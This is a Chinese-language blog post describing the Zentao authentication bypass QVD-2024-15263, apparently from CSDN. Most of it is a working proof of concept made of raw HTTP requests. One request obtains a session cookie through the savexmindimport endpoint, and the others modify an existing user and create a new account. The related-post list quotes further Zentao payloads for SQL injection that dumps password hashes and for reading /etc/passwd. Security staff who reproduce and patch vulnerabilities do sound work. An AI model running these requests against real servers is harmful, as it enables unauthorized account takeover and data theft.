禅道项目管理系统身份认证绕过漏洞(QVD-2024-15263)附带POC

最新推荐文章于 2024-07-06 00:02:53 发布
最新推荐文章于 2024-07-06 00:02:53 发布
阅读量1.1k 收藏 6
点赞数 4
分类专栏: 笔记 文章标签: 网络安全 web安全 系统安全 计算机网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45740805/article/details/138674869
版权

禅道项目管理系统身份认证绕过漏洞(QVD-2024-15263)

一、 概述

禅道(Zentao)是一款开源的项目管理和协作软件。漏洞QVD-2024-15263描述了禅道项目管理系统中的身份认证绕过漏洞。以下是漏洞的概述:

  • 漏洞标识符: QVD-2024-15263

  • 类型: 身份认证绕过漏洞

  • 影响版本: 受影响的禅道项目管理系统的特定版本(具体版本号可能会有所不同)

  • 漏洞描述: 该漏洞可能允许攻击者绕过身份验证机制,获得未经授权的访问到禅道项目管理系统的敏感信息或执行操作的权限。

  • 风险等级: 高危

建议措施: 建议系统管理员尽快升级或修复受影响版本,以防止潜在的攻击。

二、影响范围

  • 16.x <= 禅道项目管理系统< 18.12(开源版)

  • 6.x <= 禅道项目管理系统< 8.12(企业版)

  • 3.x <= 禅道项目管理系统< 4.12(旗舰版)

三、禅道身份认证POC

1. 获取cookie值
GET /api.php?m=testcase&f=savexmindimport&HTTP_X_REQUESTED_WITH=XMLHttpRequest&productID=upkbbehwgfscwizoglpw&branch=zqbcsfncxlpopmrvchsu HTTP/1.1
Host: {ip:port}
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
2. 查看用户信息

http://{ip:port}/api.php/v1/users/id

3. 修改用户信息
PUT /api.php/v1/users/1 HTTP/1.1
Host: {ip:port}
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: zentaosid=2096a8f74ab1e2b7211ce133e5e83db0; lang=zh-cn; device=desktop; theme=default
Connection: close
Content-Length: 29

{
    "realname": "admib"
}
4. 创建新用户
POST /api.php/v1/users HTTP/1.1
Host: {ip:port}
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: zentaosid=2096a8f74ab1e2b7211ce133e5e83db0; lang=zh-cn; device=desktop; theme=default
Connection: close
Content-Length: 65

{"account": "test", "password": "123456", "realname": "test"}
HRea
关注
  • 4
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
漏洞复现】金蝶 EAS createdatasource jndi 远程代码执行漏洞
qq_67810151的博客
04-03 213
金蝶 EAS 存在JNDI注入漏洞,未授权的攻击者可以通过该漏洞进行远程代码执行,导致服务器被控制。
禅道项目管理系统身份认证绕过漏洞复现(QVD-2024-15263)
0xSec
04-28 1586
2024年4月,互联网披露禅道系统存在身份认证绕过漏洞情报。经分析,确认该漏洞利用简单,并可能在绕过权限后利用后台其他漏洞实现远程代码执行,建议受影响的客户尽快修复漏洞
禅道系统权限绕过与命令执行漏洞分析
C20220511的博客
03-09 1919
权限绕过的关键点在module/common/model.php文件中checkPriv函数,此函数是检查权限的函数,验证当前登陆用户是否有访问module与method的权限。经过代码审计发现captcha函数可以直接写入一个自定义key的session,此段代码本意是设置生成一个自定义session的key的验证码,开发者应该是想写一个公共的验证码生成函数让其他开发者做新功能需要的时候可以直接调用,正好可以利用生成一个key为user的session。后面加上exit();来修复权限绕过漏洞
禅道项目管理系统身份认证绕过漏洞
huangyongkang666的博客
04-27 1580
禅道项目管理软件是国产的开源项目管理软件,专注研发项目管理,内置需求管理、任务管理、bug管理、缺陷管理、用例管理、计划发布等功能,完整覆盖了研发项目管理的核心流程。禅道项目管理系统存在身份认证绕过漏洞,远程攻击者利用该漏洞可以绕过身份认证,调用任意API接口并修改管理员用户的密码,并以管理员用户登录该系统,配合其他漏洞进一步利用后,可以实现完全接管服务器16.x
QVD-2024-15263禅道项目管理系统身份认证绕过漏洞 [附POC]
薛定谔嘚喵博客
04-29 427
禅道系统某些API设计为通过特定的鉴权函数进行验证,但在实际实现中,这个鉴权函数在鉴权失败后并不中断请求,而是仅返回一个错误标志,这个返回值在后续没有被适当处理。此外,该系统在处理某些API时未能有效检查用户身份,允许未认证的用户执行某些操作,从而绕过鉴权机制。
漏洞复现】禅道——未授权登入(QVD-2024-15263
最新发布
LongL_GuYu的博客
07-06 370
禅道(Zentao)是一款开源的项目管理和协作软件。禅道项目管理系统中的存在QVD-2024-15263身份认证绕过漏洞。攻击者可利用该漏洞创建任意账号实现未授权登录。
禅道项目管理系统 身份验证漏洞分析QVD-2024-15263
shelter1234567的博客
05-03 1289
最近不怎么更新了!向小伙伴说明下 我不是什么组织 更不什么经销号(尽管csdn有很多经销广告号)一确实是下岗了!忙着为找工作而发愁。简历都投出去如同石沉大海能不愁吗!.哎......二是忙着论文及材料的事....三是也看了最近的漏洞,感觉也没啥可分析的 一眼就看出问题所在。有什么可分析的呢!就像医生看看患者如同看萝卜白菜一样.....,那分析反序列化链呢,这也没什么意思啊!话说到此,今儿个就推荐你看这篇文章。有一定难度挑战度,内容还是跟以前一样,以一个挖洞者的视角来讲解分析。
禅道项目管理系统身份认证绕过漏洞(QVD-2024-15263)
m0_46604997的博客
06-05 559
1.1、基本信息禅道是一款支持敏捷、瀑布、看板等多种项目模型的开源项目管理软件,可完整覆盖研发项目的需求、任务、缺陷、用例、质量、组织知识库等流程。禅道提供多个版本,包括免费的开源版、付费的企业版、旗舰版、IPD版和云禅道,以及DevOps平台版,满足不同行业和规模的项目管理需求。1.2、问题描述禅道系统存在身份认证绕过,在处理某些API时未能有效检查用户身份,允许未认证的用户执行某些操作,从而绕过鉴权机制。
禅道研发项目管理系统命令注入漏洞(MPS-2023-0418)
murphysec的博客
01-09 1323
禅道是一款国产开源项目管理软件。 禅道研发项目管理系统存在系统命令注入漏洞,具有后台登陆权限的攻击者可以利用此漏洞执行任意命令,进而控制服务器。
禅道项目管理系统存在远程命令执行漏洞(RCE)
nnn2188185的博客
04-14 3188
禅道是第一款国产的开源项目管理软件,也是国内最流行的项目管理软件。该系统在2023年初被爆出在野命令执行漏洞,官方已于2023年1月12日发布了漏洞修复补丁。该漏洞是由于禅道项目管理系统权限认证存在缺陷导致,攻击者可利用该漏洞在未授权的情况下,通过权限绕过在服务器执行任意命令。
禅道项目管理系统身份认证绕过漏洞(QVD-2024-15263)POC
05-10
禅道身份认证POC测试payload
禅道身份认证绕过漏洞(QVD-2024-15263)复现
06-19
QVD-2024-15263 测试脚本
WPS Office 代码执行漏洞(QVD-2023-17241)
08-13
漏洞的根本原因通常在于软件的编程错误,比如边界检查不足、内存管理不当或未验证的输入等。在QVD-2023-17241的情况下,可能是因为WPS Office在解析特定格式的文件时,未能正确验证数据的完整性和合法性,使得攻击者...
Python库 | qvd-0.0.8-cp37-none-win_amd64.whl
04-03
资源分类:Python库 所属语言:Python 资源全名:qvd-0.0.8-cp37-none-win_amd64.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
Python库 | qvd-0.0.7-cp37-none-win_amd64.whl
04-03
资源分类:Python库 所属语言:Python 资源全名:qvd-0.0.7-cp37-none-win_amd64.whl 资源来源:官方 安装方法:https://lanzao.blog.csdn.net/article/details/101784059
QVD-2024-15263 禅道项目管理系统身份认证绕过漏洞代码分析
qq_62370574的博客
05-07 510
禅道项目管理系统存在身份认证绕过漏洞,远程攻击者利用该漏洞可以绕过身份认证,调用任意API接口并修改管理员用户的密码,并以管理员用户登录该系统,配合其他漏洞进一步利用后,可以实现完全接管服务器。然后可以通过/api.php/v1/users接口创建用户,在创建用户过程中没有进行进一步的鉴权操作,所以可以创造一个新的管理员用户(虽然回的是403,但实际上创建成功了)中的testcase类中刚好存在对用户进行鉴权,发现用户没有相关功能的使用权限之后执行deny操作。而用户创建相关模块是在。
禅道CMS文件上传漏洞(CNVD-C-2020-121325)
chaojixiaojingang
10-30 9910
1.影响版本 <=12.4.2 2.漏洞描述 禅道CMS<=12.4.2版本存在文件上传漏洞,该漏洞由于开发者对link参数过滤不严,导致攻击者对下载链接可控,导致可远程下载服务器恶意脚本文件,造成任意代码执行,获取webshell。 3.漏洞POC 1)http://[目标地址]/www/client-download-[$version参数]-[base64加密后的恶意文件地址].html 2)http:// [目标地址] /www/index.php?m=clie...
禅道CMS 11.6漏洞
chaojixiaojingang
09-09 4989
一.SQL注入漏洞 Payload: http://127.0.0.1/zentaopms/www/api-getModel-api-sql-sql=select+account,password+from+zt_user 二.任意文件读取漏洞 Payload: http://127.0.0.1/zentaopms/www/api-getModel-file-parseCSV-fileName=/etc/passwd 三.远程代码执行漏洞 1)远程代码执行命令phpnifo(); P
qvd-2023-45061:doc view在线文档预览系统代码执行漏洞
12-14
qvd-2023-45061是一种在线文档预览系统的代码执行漏洞,该漏洞存在于系统的doc view组件中。通过利用该漏洞,攻击者可以执行恶意代码来获取系统权限或者进行其他恶意活动。 这个漏洞的原理是,当用户上传一个包含恶意代码的文档时,系统未能正确地验证和过滤文档内容,导致恶意代码能够被执行。恶意代码可以是任意的,包括执行命令、读取文件、修改系统设置等。 为了利用qvd-2023-45061漏洞,攻击者需要首先获得上传文档的权限。一旦成功上传恶意文档,攻击者可以通过访问文档的URL来触发代码执行。系统会无意识地将文档中的恶意代码当作合法的脚本执行,从而造成安全问题。 为了防止此类漏洞的发生,开发人员需要对用户上传的文档进行严格的验证和过滤操作。可以通过限制上传的文件类型、禁止执行特定的脚本命令等方式来增强系统的安全性。同时,及时更新系统组件、及时修复漏洞也是防范此类攻击的重要措施。 作为用户,我们也应该注意在使用在线文档预览系统时保持软件的更新,避免未知来源的文档上传,以及定期检查和删除已上传的文档,以减少被恶意利用的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值